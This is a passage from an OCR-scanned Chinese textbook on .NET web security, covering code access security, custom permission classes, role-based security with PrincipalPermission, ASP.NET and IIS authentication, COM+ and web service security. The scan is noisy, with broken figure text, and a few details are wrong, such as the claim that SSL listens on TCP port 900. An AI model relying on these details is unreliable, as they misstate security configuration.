度 信任 控件 ， 但 是 ， 代 码 访问 安全 性 通过 有 选择 地 重 写 安全 堆栈 审核 技术 提供 实现 此 方案 。 

高 度 信任 控件 必须 明智 地 使 用 Asserts 来 简化 对 它们 的 调用 方 ( 它 们 从 中 运行 的 网 页 》 
通常 没有 的 权限 执行 的 堆栈 审核 技术 。 使 用 Asserts 时 必须 小 心 , 不 要 公开 可 能 会 使 恶意 网 
页 执行 不 当 操作 的 危险 API。 在 编写 高 度 信 任 控 件 时 需要 的 谨慎 程度 和 安全 意识 与 编写 安 
全 类 库 时 需要 的 谨慎 程度 和 安全 意识 一 样 多 。 

下 面 是 有 关 编 写 安全 托管 控件 的 一 些 提示 : 

口 封装 需要 高 度 信任 的 操作 ， 使 权限 不 会 被 控件 公开 。 这 样 ， 就 可 以 断言 这 些 操作 

需要 的 权限 ， 可 以 预见 的 是 ， 使 用 该 控件 的 网 页 无 法 滥用 相应 功能 。 
口 如 果 控 件 的 设计 需要 公开 执行 的 高 度 信任 操作 ， 请 考虑 发 出 一 个 站 点 或 URL 标识 
权限 要 求 ， 以 确保 控件 从 其 运行 的 网 页 调用 控件 。 

2) 部 署 

高 度 信任 控件 应 当 具 有 强 名 称 或 签 有 发 行者 证 书 (X.509)， 使 得 策略 管理 员 可 以 将 更 
高 程度 信任 授予 这 些 控件 ， 而 不 会 削弱 它们 在 其 他 Intranet/Internet 代码 方面 的 安全 性 。 对 
程序 集 签名 后 ， 用 户 必须 创建 关联 有 足够 权限 的 新 代码 组 ， 并 指定 只 允许 拥有 用 户 的 公司 
或 组 织 签名 的 代码 成 为 该 代码 组 成 员 。 以 此 方式 修改 安全 策略 后 ， 高 度 信任 控件 将 收 到 足 
够 的 权限 来 执行 操作 。 

修改 安全 策略 后 ， 高 度 信 任 的 控件 才能 正常 运行 ， 所 以 在 企业 的 Intranet 上 部 署 这 种 
类 型 的 控件 要 容易 得 多 ， 企 业 的 Intranet 通常 设 有 企业 管理 员 ， 管 理 员 可 将 描述 的 策略 更 
改 部 署 到 多 个 客户 端 计算 机 上 。 为 了 让 没有 共同 组 织 关 系 的 一 般 用 户 通过 Internet 使 用 高 
度 信 任 控 件 ， 控 件 发 行者 和 用 户 之 间 必 须 有 一 种 信任 关系 。 最 终 ， 用 户 必须 愿意 使 用 发 行 
者 的 说 明 来 修改 策略 ， 并 允许 高 度 信 任 控件 执行 。 


8. 
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6. 创建 自 定义 代码 访问 权限 类 


.NET 框架 提供 了 一 组 代码 访问 权限 类 ， 保护 一 组 特定 的 资源 和 操作 ， 并 重点 保护 
由 .NET 框架 公开 的 那些 资源 。 在 权限 主题 中 对 这 些 类 进行 了 概括 描述 , 在 每 个 权限 类 的 文 
档 中 提供 对 该 权限 类 的 详细 描述 。 对 于 多 数 环境 ， 内 置 的 代码 访问 权限 已 经 够 用 。 但 在 某 
些 情况 下 ， 定 义 自己 的 代码 访问 权限 类 可 能 会 有 用 。 此 主题 讨论 定义 自 定义 代 码 访问 权限 
类 的 场合 、 原 因 和 方式 。 

如 果 要 定义 一 个 组 件 或 类 库 ， 该 组 件 或 类 库 访 问 内 置 权限 类 未 涵盖 但 需要 避免 未 经 授 
权 的 代码 访问 的 资源 ， 则 应 当 考 虑 创建 一 个 自 定义 代码 访问 权限 类 。 如 果 希 望 对 自 定义 权 
限 发 出 声明 式 要 求 ， 还 必须 为 该 权限 定义 一 个 Attribute 类 。 提 供 这 些 类 并 从 类 库 内 发 出 对 
该 权限 的 要 求 , 可 以 防止 未 经 授权 的 代码 访问 相应 的 资源 , 并 使 管理 员 能 够 配置 访问 权限 。 

还 有 其 他 一 些 情况 适合 使 用 自 定义 权限 。 如 果 内 置 代码 访问 权限 类 保护 一 种 资源 但 不 
能 充分 控制 对 该 资源 的 访问 ， 则 需要 使 用 自 定义 代码 访问 权限 。 例 如 ， 一 种 应 用 程序 可 能 
使 用 人 事 记 录 ， 每 个 职员 的 记录 存储 在 一 个 单独 的 文件 中 ; 在 这 种 情况 下 ， 可 以 独立 地 对 
不 同类 型 的 职员 数据 进行 读 写 控制 。 应 用 程序 可 能 授权 内 部 管理 工具 读 取 某 个 职员 的 人 事 
文件 ， 但 不 允许 该 工具 修改 这 些 文件 。 事 实 上 ， 甚 至 可 能 不 允许 该 工具 读 取 某 些 部 分 。 

自 定 义 代码 访问 权限 还 适用 于 这 种 情况 : 内 置 权限 虽然 存在 ， 但 其 定义 方式 不 能 使 之 
恰当 地 保护 资源 。 例 如 ， 对 一 种 UI 功能 (如 创建 菜单 的 功能 ) 必须 进行 保护 ， 但 内 置 的 
UIPermission 类 却 不 提供 保护 。 在 这 种 情况 下 ， 可 以 创建 一 种 自 定 义 权 限 来 保护 创建 菜单 
的 功能 。 

只 要 可 能 , 权限 就 不 应 重合 。 拥有 多 个 权限 保护 一 种 资源 会 给 管理 员 带 来 很 大 的 问题 : 
管理 员 在 每 次 配置 访问 该 资源 的 权限 时 ， 都 必须 确保 正确 地 处 理 所 有 重合 的 权限 。 

实现 自 定义 代码 访问 权限 包括 下 列 步 又， 其 中 的 一 些 步骤 是 可 选 的 。 每 个 步骤 在 一 个 
单独 主题 中 进行 描述 。 

(1) 设计 Permission 类 。 

(2) 实现 IPermission 和 IUnrestrictedPermission 接口 。 

(3) 实现 ISerializable 接口 (如 果 性 能 需要 ， 或 者 为 了 支持 特殊 的 数据 类 型 )。 

(4) 处 理 XML 编码 和 解码 。 

(5) 通过 实现 Attribute 类 添加 声明 式 安全 支持 。 

(6) 在 适当 的 时 候 请 求 自 定义 权限 。 

(7) 更 新 安全 策略 以 便 识 别 自 定 义 权 限 。 








1.1.2 ”代码 的 安全 策略 


商务 应 用 程序 需要 根据 用 户 提供 的 凭据 开放 对 数据 或 资源 的 访问 权限 。 通 常情 况 下 ， 
这 种 应 用 程序 会 检查 用 户 的 角色 ， 并 根据 该 角色 提供 对 相应 资源 的 访问 。 公 共 语 a 
根据 Windows 账户 或 自 定义 标识 提供 基于 角色 的 授权 支持 。 


1. 概述 
在 财务 或 商务 应 用 程序 中 经 常 使 用 角色 限制 策略 。 例 如 ， 应 用 程序 可 能 根据 提出 请 求 
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的 用 户 是 不 是 指定 角色 的 成 员 ， 对 要 处 理 的 事务 大 小 加 以 限制 。 职 员 有 权 处 理 的 事务 可 能 
小 于 指定 的 阐 值 ， 主 管 拥有 的 权限 可 能 比 职员 的 高 ， 而 副 总 裁 的 权限 可 能 还 更 高 (或 根本 
不 受 限 制 )。 当 应 用 程序 需要 多 个 批准 完成 某 项 操作 时 ， 也 可 以 使 用 基于 角色 的 安全 性 。 例 
如 ， 在 一 个 采购 系统 中 ， 任 何 雇员 均 可 生成 采购 请 求 ， 但 只 有 采购 代理 人 可 以 将 此 请 求 转 
换 成 可 发 送 给 供应 商 的 采购 订单 。 

.NET 框架 基于 角色 的 安全 性 通过 生成 可 供 当前 线程 使 用 的 主体 信息 来 支持 授权 , 而 主 
体 是 用 关联 的 标识 构造 的 。 标 识 ( 及 其 帮助 定义 的 主体 ) 可 以 基于 Windows 账户 ， 也 可 以 
是 同 Windows 账户 无 关 的 自 定义 标识 。.NET 框架 应 用 程序 可 以 根据 主体 的 标识 或 角色 成 
员 条 件 (或 两 者 ) 做 出 授权 决定 。 角色 是 指 在 安全 性 方面 具有 相同 特权 的 一 组 命名 主体 (如 
出 纳 或 经 理 )。 一 个 主体 可 以 是 一 个 或 多 个 角色 的 成 员 。 因 此 ,应 用 程序 可 以 使 用 角色 成 员 
条 件 来 确定 主体 是 否 有 权 执 行 某 项 请 求 的 操作 。 

为 了 使 权限 控制 代码 易于 使 用 并 与 .NET 语言 保持 一 致 性 ，.NET 框架 基于 角色 的 安全 
性 提供 了 PrincipalPermission 对 象 ， 此 对 象 使 公共 语言 运行 库 能 够 按照 与 代码 访问 安全 性 
检查 类 似 的 方式 执行 授权 。PrincipalPermission 类 表示 主体 必须 匹配 的 标识 或 角色 ， 并 同 声 
明 式 和 命令 性 安全 检查 都 兼容 。 也 可 以 直接 访问 主体 的 标识 信息 ， 并 在 需要 时 在 代码 中 执 
行 角色 和 标识 检查 。 

.NET 框架 提供 了 灵活 且 可 扩展 的 基于 角色 的 安全 性 支持 ,足以 满足 广泛 的 应 用 程序 的 
需要 。 可 选择 同 现 有 的 身份 验证 结构 (如 COM+1.0 服务 ) 相互 操作 ， 或 创建 自 定义 身份 
验证 系统 。 基于 角色 的 安全 性 尤其 适用 于 主要 在 服务 器 处 理 的 ASPNET Web 应 用 程序 。 不 
过 ，.NET 框架 基于 角色 的 安全 性 既 可 用 于 客户 端 ， 也 可 用 于 服务 器 。 


2. 主体 和 标识 对 象 


托管 代码 可 通过 Principal 对 象 发 现 主体 的 标识 或 角色 ， 该 对 象 包含 对 Identity 对 象 的 
引用 。 将 标识 和 主体 对 象 同 用 户 与 组 账户 这 样 常见 的 概念 进行 比较 ， 可 能 会 有 所 帮助 。 在 
多 数 网 络 环境 中 ， 用 户 账户 表示 人 员 或 程序 ， 而 组 账户 表示 特定 类 别 的 用 户 及 其 拥有 的 权 
限 。 同 样 , NET 框架 中 的 标识 对 象 表示 用 户 , 而 角色 表示 成 员 条 件 与 安全 性 上 下 文 。 在 .NET 
框架 中 , 主体 对 象 同时 封装 标识 对 象 和 角色 。.NET 框架 应 用 程序 根据 主体 的 标识 或 角色 成 
员 条 件 〈 后 者 更 常见 ) 向 主体 授予 权限 。 

1) 标识 对 象 

标识 对 象 封装 有 关 正 在 验证 的 用 户 或 实体 的 信息 。 在 最 基本 的 级 别 上 ， 标 识 对 象 包含 
名 称 和 身份 验证 类 型 。 名 称 可 以 是 用 户 名 或 Windows 账户 名 ， 而 身份 验证 类 型 可 以 是 所 支 
持 的 登录 协议 〈 如 Kerberos V5) 或 自 定义 值 。.NET 框架 定义 了 一 个 GenericIdentity 对 象 
和 一 个 更 专用 的 WindowsIdentity 对 象 , 前 者 可 用 于 大 多 数 自 定义 登录 方案 ; 后 者 可 用 于 希 
望 应 用 程序 依赖 Windows 身份 验证 的 情况 。 此 外 ,还 可 以 定义 自己 的 标识 类 来 封装 自 定义 
用 户 信 息 。 

Identity 接口 定义 用 于 访问 名 称 和 身份 验证 类 型 (如 Kerberos V5 或 NTLM) 的 属性 。 
所 有 Identity 类 均 实现 Identity 接口 。Identity 对 象 同 执行 当前 线程 所 用 的 Windows 进程 标 
记 之 间 不 需要 有 什么 关系 。 但 是 ， 如 果 Identity 对 象 是 WindowsIdentity 对 象 ， 则 假定 标识 
表示 安全 标记 。 
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2) 主体 对 象 

主体 对 象 表示 代码 运行 时 所 在 的 安全 上 下 文 。 实 现 基 于 角色 的 安全 性 的 应 用 程序 将 基 

于 与 主体 对 象 关联 的 角色 来 授予 权限 。 与 标识 对 象 相似 ，.NET 框架 也 提供 了 Generic 
Principal 对 象 和 WindowsPrincipal 对 象 。 您 还 可 以 定义 自己 的 自 定义 主体 类 。 
IPrincipal 接口 定义 一 个 属性 和 一 个 方法 ， 前 者 用 于 访问 关联 的 Identity 对 象 ， 后 者 用 
于 确定 Principal 对 象 所 标识 的 用 户 是 否 为 给 定 角色 的 成 员 。 所 有 Principal 类 都 实现 
IPrincipal 接口 以 及 任何 必需 的 附加 属性 和 方法 。 例 如 ， 公 共 语 言 运行 库 提供 了 
WindowsPrincipal 类 ,该 类 实现 将 Windows Vista 或 Windows 7 组 成 员 条 件 映 射 到 角色 的 附 
加 功能 。 

Principal 对 象 将 被 绑 定 到 应 用 程序 域 (AppDomain) 内 部 的 调用 上 下 文 (CallContext) 
对 象 。 默 认 的 调用 上 下 文 总 是 用 每 个 新 的 AppDomain 创建 的 ， 因 此 总 是 存在 可 用 于 接受 
Principal 对 象 的 调用 上 下 文 。 创 建新 线程 的 同时 也 为 该 线程 创建 CallContext 对 象 。 Principal 
对 象 引用 从 创建 线程 自动 复制 到 新 线程 的 CallContext 中 。 如 果 运 行 库 无 法 确定 哪个 
Principal 对 象 属于 线程 的 创建 者 ， 将 遵循 Principal 和 Identity 对 象 创建 的 默认 策略 。 

可 配置 的 应 用 程序 域 特定 策略 定义 了 一 些 规则 ， 用 以 决定 同 新 的 应 用 程序 域 关 联 的 
Principal 对 象 类 型 。 在 安全 策略 的 允许 范围 内 ， 运 行 库 可 创建 Principal 和 Identity 对 象 来 
反射 同 当 前 执行 线程 关联 的 操作 系统 标记 。 默 认 情 况 下 ， 运 行 库 使 用 Principal 和 Identity 
对 象 表示 未 经 身份 验证 的 用 户 。 运 行 库 不 创建 这 些 默 认 的 Principal 和 Identity 对 象 ， 除 非 
代码 试图 访问 它们 。 

创建 应 用 程序 域 的 受信 任 代 码 可 设置 应 用 程序 域 策 略 ,以 控制 默认 Principal 和 Identity 
对 象 的 构造 。 此 应 用 程序 域 特定 的 策略 适用 于 该 应 用 程序 域 中 的 所 有 执行 线程 。 非 托管 的 
受信 任 宿主 本 身 就 具有 设置 此 策略 的 能 力 ， 但 托管 代码 必须 具有 控制 域 策略 的 System. 
Security.Permissions.SecurityPermission 才能 设置 此 策略 。 

在 不 同 的 应 用 程序 域 之 间 、 但 在 同一 进程 内 〈 因 此 在 同一 台 计 算 机 上 ) 传输 Principal 
对 象 时 ， 远 程 基础 结构 将 同调 用 方 上 下 文 相关 联 的 、 对 Principal 对 象 的 引用 复制 到 被 调用 
方 的 上 下 文中 。 


3. PrincipalPermission 对 象 


基于 角色 的 安全 性 模型 支持 与 代码 访问 安全 性 模型 中 的 权限 对 象 类 似 的 权限 对 象 。 此 
对 象 ( 即 PrincipalPermission) 表示 特定 主体 类 在 运行 时 必须 具有 的 标识 和 角色 。 以 命令 方 
式 和 声明 方式 进行 的 安全 检查 均 可 使 用 PrincipalPermission 类 。 

若 要 以 命令 方式 实现 PrincipalPermission 类 ， 请 创建 该 类 的 一 个 新 实例 ， 并 用 希望 用 
户 在 访问 代码 时 具有 的 名 称 和 角色 来 初始 化 该 实例 .例如 , 以 下 代码 以 "Joan" 身 份 和 "Teller" 
角色 对 此 对 象 的 一 个 新 实例 进行 初始 化 。 

String id = "Joan"; 

String role = "Teller"; 

PrincipalPermission PrincipalPerm = new PrincipalPermission(id, role); 

可 使 用 PrincipalPermissionAttribute 类 以 声明 方式 创建 一 个 类 似 的 权限 。 以 下 代码 以 声 
明 方式 将 身份 初始 化 为 Joan， 并 将 角色 初始 化 为 Teller。 
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[PrincipalPermissionAttribute (SecurityAction.Demand,Name = "Joan", Role = 
"Teller")] 


执行 安全 检查 时 ， 为 成 功 完 成 检查 ， 指 定 的 身份 和 角色 必须 匹配 。 但 是 ， 创 建 
PrincipalPermission 对 象 时 ， 可 传递 一 个 null 身份 字符 串 以 指示 主体 的 身份 可 以 是 任意 的 。 
同样 ,传递 一 个 null 角色 字符 串 指 示 主 体 可 以 是 任何 角色 的 成 员 ( 或 根本 不 属于 任何 角色 )。 
对 于 声明 的 安全 性 ， 可 通过 省 略 两 种 属性 中 的 一 个 来 获得 相同 的 效果 。 例 如 ， 下 列 代码 使 
用 PrincipalPermissionAttribute 以 声明 方式 指示 主体 可 以 具有 任意 名 称 , 但 必须 具有 出 纳 的 
角色 。 


[PrincipalPermissionAttribute (SecurityAction.Demand, Role = "Teller")] 
4. 基于 角色 的 安全 检查 


定义 了 标识 和 主体 对 象 后 ， 可 采用 下 列 方法 之 一 对 其 进行 安全 检查 : 

口 使 用 命令 式 安全 检查 ; 

口 使 用 声明 式 安全 检查 ; 

口 直接 访问 Principal 对 象 。 

托管 代码 可 使 用 命令 式 或 声明 式 安 全 检查 来 确定 以 下 内 容 : 特定 主体 对 象 是 否 是 已 知 
角色 的 成 员 ， 是 否 具有 已 知 的 身份 ， 或 是 否 表示 一 种 角色 中 的 一 个 已 知 身份 。 若 要 通过 命 
令 式 或 声明 式 安全 性 进行 安全 检查 ， 必 须 对 适当 构造 的 PrincipalPermission 对 象 生成 一 个 
安全 请 求 。 安 全 检查 期 间 ， 公 共 语 言 运行 库 检查 调用 方 的 主体 对 象 ， 确 定 其 身份 和 角色 是 
和 否 与 所 请 求 的 PrincipalPermission 表示 的 身份 和 角色 相 匹 配 。 如 果 主 体 对 象 不 匹配 ， 则 将 
引发 SecurityException。 只 检查 当前 线程 的 主体 对 象 ，PrincipalPermission 类 不 会 像 代码 访 
问 权限 那样 导致 产生 堆栈 遍历 。 

此 外 ， 可 以 直接 访问 主体 对 象 的 值 ， 并 在 不 使 用 PrincipalPermission 对 象 的 情况 下 执 
行 检 查 。 在 这 种 情况 下 ， 只 需 读 取 当 前 线程 主体 的 值 或 使 用 IsInRole 方法 执行 身份 验证 。 

5. 同 COM+1.0 安 全 性 相互 操作 








可 以 使 用 新 的 .NET 框架 托管 组 件 来 扩展 现 有 的 COM+1.0 应 用 程序 .COM+1.0 安全 性 
上 下 文 仍 由 COM+1.0 托管 ， 而 COM+1.0 管理 用 户 界面 用 于 配置 应 用 程序 。 从 COM+1.0 
应 用 程序 看 ，.NET 框架 对 象 基本 上 类 似 于 COM+1.0 对 象 。 

若 要 使 NET 框架 对 象 对 COM+1.0 安全 服务 可 见 , 必须 运行 由 Windows 软件 开发 工具 
包 (SDK) 提供 的 工具 (如 Tlbexp.exe)， 以 便 为 公共 接口 生成 类 型 库 并 注册 这 些 对 象 ， 以 
使 COM+1.0 可 以 定位 它们 。COM+1.0 管理 功能 必须 用 于 配置 角色 以 及 其 他 基于 角色 的 安 
全 行为 。 

与 COM+1.0 安全 性 的 相互 操作 有 一 些 局限 性 。COM+1.0 安全 属性 不 在 进程 间或 计算 
机 边界 之 间 传 播 ， 也 不 传播 到 托管 代码 中 新 创建 的 执行 线程 。COM+1.0 安全 服务 只 能 在 
Windows Vista 系统 上 由 托管 代码 使 用 。 

.NET 框架 在 System.EnterpriseServices 命名 空间 中 提供 了 若干 个 允许 对 COMY+1.0 安全 
功能 进行 访问 的 托管 包装 。 
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1.2 可 靠 的 安全 架构 


一 个 Web 应 用 系统 包含 了 诸多 功能 ， 如 果 只 单一 的 加 固 每 个 功能 模块 的 安全 性 ， 只 能 
使 得 系统 的 安全 性 支离破碎 。 为 了 实现 应 用 系统 整体 的 安全 性 ， 开 发 人 员 需 要 明确 编程 语 
言 的 安全 技术 各 个 部 分 是 如 何 相 互 协作 的 。 

本 书 讨论 的 Web 应 用 系统 的 安全 模型 包括 : ASPNET、 企 业 服 务 和 Web 服务， 下面 
就 逐一 介绍 每 个 组 成 部 分 的 安全 性 。 


1. ASP.NET 的 安全 性 


ASP.NET 用 于 实现 用 户 界面 服务 。 通 过 将 已 验证 的 凭据 或 它们 的 表示 形式 与 某 些 内 容 
进行 比较 ，ASP.NET 可 以 控制 对 站 点 信息 的 访问 。 这 些 内 容 可 以 是 NTFS 文件 系统 权限 ， 
也 可 以 是 列 出 了 已 授权 用 户 、 已 授权 角色 (组 ) 或 已 授权 的 XML 文件 。 

ASP.NET 身份 验证 模式 包括 匿名 、Windows、Passport 和 窗 体 身份 验证 。 

口 匿名 身份 验证 。 如 果 不 需 要 对 客户 端 进行 身份 验证 (或 者 实现 自 定义 的 身份 验证 
方案 )， 则 可 以 配置 IS 进行 匿名 身份 验证 。 在 这 种 情况 下 ，Web 服务 器 创建 
Windows 访问 令 牌 来 表示 使 用 同一 个 匿名 (或 来 宾 ) 账户 的 所 有 匿名 用 户 。 默 认 
匿名 账户 是 IJUSR_MACHINENAME, 其 中 MACHINENAME 是 在 安装 时 为 计算 机 
指定 的 NetBIOS 名 称 。 

口 Windows 身份 验证 。 在 这 种 身份 验证 模式 下 ，ASP.NET 依靠 IIS 对 用 户 进行 身份 
验证 并 创建 Windows 访问 令 牌 来 表示 经 过 身份 验证 的 标识 ,IIS 提供 的 身份 验证 机 
制 见 下 面 详细 说 明 。 

口 Passport 身份 验证 。 在 这 种 身份 验证 模式 下 ，ASP.NET 使 用 Microsoft Passport 的 
集中 式 身份 验证 服务 。ASP.NET 对 Microsoft Passport 软件 开发 工具 包 SDK 必须 
安装 在 Web 服务 器 上 ) 提供 的 功能 进行 包装 。 

口 窗 体 身 份 验证 。 此 方法 使 用 客户 端 重 定向 将 没有 经 过 身份 验证 的 用 户 转发 到 指定 
的 HTML 窗 体 ， 用 户 可 以 在 该 窗 体 中 输入 证 书 (通常 是 用 户 名 和 密码 ) 。 然 后 ， 
系统 对 这 些 证 书 进行 验证 ， 生 成 身份 验证 票 并 将 其 返回 客户 端 。 身 份 验 证 票 上 有 
用 户 标 识 ， 还 可 以 选择 在 身份 验证 票 上 列 出 用 户 在 会 话 期 间 所 属 的 角色 。 

有 时 ， 窗 体 身份 验证 只 用 于 Web 站 点 的 个 性 化 处 理 。 在 这 种 情况 下 ， 几 乎 不 用 编写 任 

何 自 定义 代码 ， 因 为 ASPNET 用 简单 的 配置 自动 处 理 这 一 过 程 的 大 部 分 工作 。 在 个 性 化 
处 理 方 案 中 ，Cookie 只 需要 保留 用 户 名 即 可 。 窗 体 身 份 验证 以 明文 形式 向 Web 服务 器 发 
送 用 户 名 和 密码 。 因 此 ， 应 该 将 窗 体 身份 验证 与 SSL 保护 的 信道 结合 使 用 。 为 了 对 后 续 请 
求 中 传输 的 身份 验证 Cookie 不 间断 地 提供 保护 , 应 该 考虑 在 应 用 程序 内 的 所 有 页 上 使 用 SSL。 

IS 提供 的 身份 验证 机 制 分 为 如 下 几 种 : 

口 基本 身份 验证 。 基 本 身份 验证 要 求 用 户 以 用 户 名 和 密码 的 形式 提供 证 书 以 证 明 其 
标识 。 用 户 证 书 以 不 加 密 的 Base64 编码 格式 从 浏览 器 传送 到 Web 服务 器 。 由 于 
Web 服务 器 得 到 的 用 户 证 书 是 不 加 密 的 格式 ,因此 Web 服务 器 可 以 使 用 用 户 证 书 
发 出 远程 调用 。 
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摘要 式 身份 验证 。 这 种 验证 方式 从 浏览 器 向 Web 服务 器 传送 用 户 证 书 时 采用 哈 希 
格式 , 因此 更 为 安全 。 不 过 它 要 求 使 用 Intermet Explorer 5.0 或 更 高 版 本 的 客户 端 以 
及 特定 的 服务 器 配置 。 

集成 Windows 身份 验证 。 集 成 的 Windows 身份 验证 使 用 与 用 户 Internet Explorer 
Web 浏览 器 的 加 密 交 换 来 确认 用 户 标识 。 只 有 Intemet Explorer 支持 这 种 验证 。 所 
以 ， 这 种 验证 一 般 只 能 在 Intranet 方案 中 使 用 ， 因 为 能 够 控制 Intranet 中 所 用 的 客 
户 端 软件 。 如 果 禁 用 匿名 访问 , 或 拒绝 通过 Windows 文件 系统 权限 进行 匿名 访问 ， 
那么 这 种 验证 只 能 由 Web 服务 器 使 用 。 
证 书 身 份 验证 。 证 书 身 份 验证 使 用 客户 端 证 书 明确 地 识别 用 户 ， 客 户 端 证 书 由 用 
户 的 浏览 器 《或 客户 端 应 用 程序 ) 传递 到 Web 服务 器 (如 果 是 Web 服务 ， 则 由 
Web 服务 客户 端 通过 HttpWebRequest 对 象 的 ClientCertificates 属性 传递 ) ，Web 
服务 器 从 证 书 中 提取 用 户 标 识 。 该 方法 依赖 于 用 户 计算 机 上 安装 的 客户 端 证 书 ， 
一 般 在 Intranet 或 Extranet 方案 中 使 用 ， 因 为 使 用 者 熟悉 并 能 控制 Intranet 和 
Extranet 中 的 用 户 群 。 IIS 在 收 到 客户 端 证 书后 , 可 以 将 证 书 映射 到 Windows 账户 。 
匿名 身份 验证 。 如 果 不 需要 对 客户 端 进行 身份 验证 〈 或 者 实现 自 定义 的 身份 验证 
方案 ), 则 可 以 配置 IS 进行 匿名 身份 验证 。 在 这 种 情况 下 , Web 服务 器 创建 Windows 
访问 令 牌 来 表示 使 用 同一 个 匿名 账户 的 所 有 匿名 用 户 。 默 认 匿 名 账户 是 IUSR_ 
MACHINENAME， 其 中 MACHINENAME 是 在 安装 时 为 计算 机 指定 的 NetBIOS 
名 称 。 


企业 服务 的 安全 性 











企业 服务 (Enterprise Services) 为 应 用 程序 提供 基础 结构 级 的 服务 ， 主 要 包括 分 布 式 
事务 和 资源 管理 服务 。 

如 图 1-2 所 示 的 企业 服务 应 用 程序 使 用 RPC 方式 对 调用 方 进行 身份 验证 ,。 也 就 是 采取 
特定 的 步骤 禁用 身份 验证 ， 和 否则 就 应 该 使 用 Kerberos 或 NTLM 对 调用 程序 进行 身份 验证 。 


角色 列表 国 
用 户 经 理 目录 (COM+) 
高 级 经 理 








服务 邮件 












ji 者 | | 
企业 服务 
， 服务 器 应 用 程序 


T 
DCOM (身份 验证 ) 























Machine.config 
客户 身份 验证 
模拟 设置 





企业 服务 
(COM+) 角色 














图 1-2 企业 服务 架构 





授权 是 通过 企业 服务 (COM+) 角色 提供 的 ， 这 些 角 色 可 以 包含 操作 系统 组 或 用 户 账 
户 。 角色 成 员 身 份 在 COM+ 目 录 内 定义 并 利用 “组 件 服务 ”工具 进行 管理 。 如果 客户 端 (如 
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ASPNET 的 Web 应 用 程序 ) 在 服务 组 件 上 调用 某 个 方法 ， 企 业 服务 侦 听 层 在 身份 验证 进 
程 结 束 后 访问 COM+ 目 录 以 确定 该 客户 端的 角色 成 员 身 份 ， 然 后 检查 该 角色 是 否 允 许 授权 
访问 当前 的 应 用 程序 、 组 件 、 接 口 和 方法 。 


3. Web 服 务 的 安全 性 


Web 服务 通过 使 用 SOAP 消息 在 防火 墙 之 间或 跨 平 台 系统 之 间 移 动 数据 来 实现 数据 的 
交换 和 应 用 程序 逻辑 方法 的 远程 调用 。 

Web 服务 的 安全 性 主要 包括 平台 /传输 级 (P2P) 安全 性 、 应 用 程序 级 〈 自 定义 ) 安全 
性 、Remoting 安全 性 、ADO.NET 安全 性 、Intemet 协议 安全 性 和 安全 套 接 字 层 。 

1) 平台 /传输 级 (P2P) 安全 性 

两 个 终结 点 之 间 的 传输 通道 (Web 服务 客户 端 和 Web 服务 之 间 ) 可 以 用 于 提供 点 对 
点 的 安全 性 ， 如 图 1-3 所 示 。 


1 ww 


1-3 ”平台 /传输 级 安全 性 





2) 应 用 程序 级 安全 性 

应 用 程序 使 用 自 定义 的 SOAP 标 头 传递 用 户 和 凭据, 以便 根据 每 个 Web 服务 请 求 对 用 户 
进行 身份 验证 。 常 用 的 方法 是 在 SOAP 标 头 中 传递 身份 验证 票 。 

应 用 程序 可 以 灵活 生成 其 包含 角色 的 IPrincipal 对 象 。 该 对 象 可 以 是 自 定义 类 或 NET 
框架 提供 的 GenericPrincipal 类 。 应 用 程序 可 以 有 选择 地 加 密 需 要 保密 的 内 容 , 但 是 这 需要 
使 用 安全 密 钥 存储 。 

另 一 种 方法 是 使 用 SSL 提供 机 密 性 和 完整 性 , 并 将 它 与 自 定义 的 SOAP 标 头 结合 起 来 
执行 身份 验证 。 

3) Remoting 安全 性 

Remoting 技术 可 以 跨越 进程 和 机 器 边界 访问 分 布 式 对 象 。 使 用 Remoting 技术 和 
ASP.NET 应 用 程序 客户 端 时 ， 就 会 在 Web 应 用 程序 和 远程 对 象 主机 上 进行 身份 验证 。 

当 Remoting 技术 在 ASPNET 中 应 用 时 ， 可 以 使 用 HITP 通道 在 客户 端 代理 和 服务 器 
之 间 传 递 方法 ， 包 括 IIS 身份 验证 和 ASP.NET 身份 验证 。 

当 Remoting 技术 在 Windows 服务 中 应 用 时 ， 可 以 使 用 TCP 通道 在 客户 端 和 服务 器 之 
间 传 递 方法 调用 ， 它 使 用 基于 套 接 字 的 原始 通信 方法 。 
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4) ADONET 安全 性 

ADO.NET 是 专门 为 分 布 式 Web 应 用 程序 设计 的 , 它 的 安全 性 主要 包括 SQL Server 外 
盾 、Windows 验证 和 ASPNET 验证 。 

SQL Server 外 盾 守 卫 需 要 保存 数据 库 连 接 字 符 串 ， 登 录 数 据 库 并 获取 关联 的 数据 库 角 
色 ， 其 过 程 如 图 1-4 所 示 。 








客户 端 标示 
客户 端 应 用 程序 


得 


保护 连接 字符 

申 存 储 安全 
人 -一 个 
网 关 






































图 1-4 ADONET 外 盾 机 制 


使 用 Windows 身份 验证 从 ASPNET 应 用 程序 连接 到 SQL Server 时 ， 可 以 采用 
ASP.NET 进程 标识 ， 也 可 以 采用 固定 标识 。 通 常 的 做 法 是 在 Web 服务 器 上 将 密码 更 改 为 
某 个 已 知 值 来 配置 本 地 ASP.NET 进程 标识 ， 然 后 在 数据 库 服 务 器 上 通过 创建 具有 相同 用 
户 名 和 密码 的 本 地 用 户 创建 镜像 账户 。 

5) Internet 协议 安全 性 

Intemet 协议 安全 性 提供 了 一 种 传输 层 安全 通信 和 解决 方案 , 可 以 保护 如 应 用 程序 服务 器 
和 数据 库 服务 器 之 间 的 数据 传递 ， 通 过 对 两 台 计 算 机 之 间 发 送 的 所 有 数据 进行 加 密 来 提供 
消息 的 保密 性 ， 同 时 在 两 台 计 算 机 之 间 提 供 相 互 的 身份 验证 。 

6) 安全 套 接 字 层 

安全 套 接 字 层 (Secure Sockets Layer) 提供 点 对 点 的 安全 通信 信道 。 通 过 该 信道 传输 
的 数据 都 是 经 过 加 密 的 。SSL 技术 最 常用 于 保护 浏览 器 和 Web 服务 器 之 间 的 信道 ， 也 可 以 
用 于 保护 往返 于 运行 数据 库 服 务 器 和 Web 服务 器 之 间 的 消息 。 

使 用 SSL 时 ， 客 户 端 使 用 HITP 协议 并 指定 一 个 URL， 而 服务 器 在 TCP 端口 900 上 
侦 听 。 由 于 SSL 使 用 复杂 的 加 密 功 能 来 对 数据 进行 加 密 和 解密 ， 因 此 对 应 用 程序 的 性 能 会 
产生 影响 ， 所 以 应 该 优化 使 用 SSL 的 页 面 。 
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不 论 是 .NET 框架 和 还 是 其 他 WEB 语言 都 全 部 或 部 分 含有 安全 类 库 , 它们 通常 使 用 一 
定 的 规则 来 确保 类 库 的 调用 方 拥有 访问 类 库 公 开 资 源 的 权限 。 例 如 ， 安 全 类 库 拥 有 创建 文 
